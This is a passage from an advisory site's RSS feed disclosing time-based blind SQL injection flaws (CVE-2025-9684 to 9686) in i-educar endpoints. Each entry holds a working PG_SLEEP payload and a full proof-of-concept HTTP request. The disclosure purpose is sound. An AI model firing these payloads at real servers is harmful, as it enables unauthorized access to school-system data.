&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/FormulaMedia/edit?id=1%27&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;%27WqeR%27=%27WqeR HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: [COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9684/image.png&amp;#34;
	width=&amp;#34;1177&amp;#34;
	height=&amp;#34;1049&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9684/image_hu_4da7a86622a45df0.png 480w, /p/cve-2025-9684/image_hu_1f080892d45bc258.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;112&amp;#34;
		data-flex-basis=&amp;#34;269px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9684.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9684.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 30 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9685</title>
        <link>https://www.cvehunters.com/p/cve-2025-9685/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9685/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9685-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduleareaconhecimentoview-endpoint&amp;#34;&amp;gt;CVE-2025-9685: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;/module/AreaConhecimento/view&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9685&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9685&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/module/AreaConhecimento/view&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9685-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduleareaconhecimentoview-endpoint&amp;#34;&amp;gt;CVE-2025-9685: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;/module/AreaConhecimento/view&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9685&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9685&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/module/AreaConhecimento/view&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/module/AreaConhecimento/view&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;example-request&amp;#34;&amp;gt;Example Request
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/AreaConhecimento/view?id=3&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/module/AreaConhecimento/index
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: [COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9685/image.png&amp;#34;
	width=&amp;#34;1121&amp;#34;
	height=&amp;#34;1008&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9685/image_hu_9ce46d5757c7b26c.png 480w, /p/cve-2025-9685/image_hu_eb5dd3ebbb1178d3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;111&amp;#34;
		data-flex-basis=&amp;#34;266px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9685.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9685.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 30 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9686</title>
        <link>https://www.cvehunters.com/p/cve-2025-9686/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9686/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9686-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduleareaconhecimentoedit-endpoint&amp;#34;&amp;gt;CVE-2025-9686: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;/module/AreaConhecimento/edit&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9686&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9686&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/module/AreaConhecimento/edit&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9686-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduleareaconhecimentoedit-endpoint&amp;#34;&amp;gt;CVE-2025-9686: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;/module/AreaConhecimento/edit&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9686&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9686&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
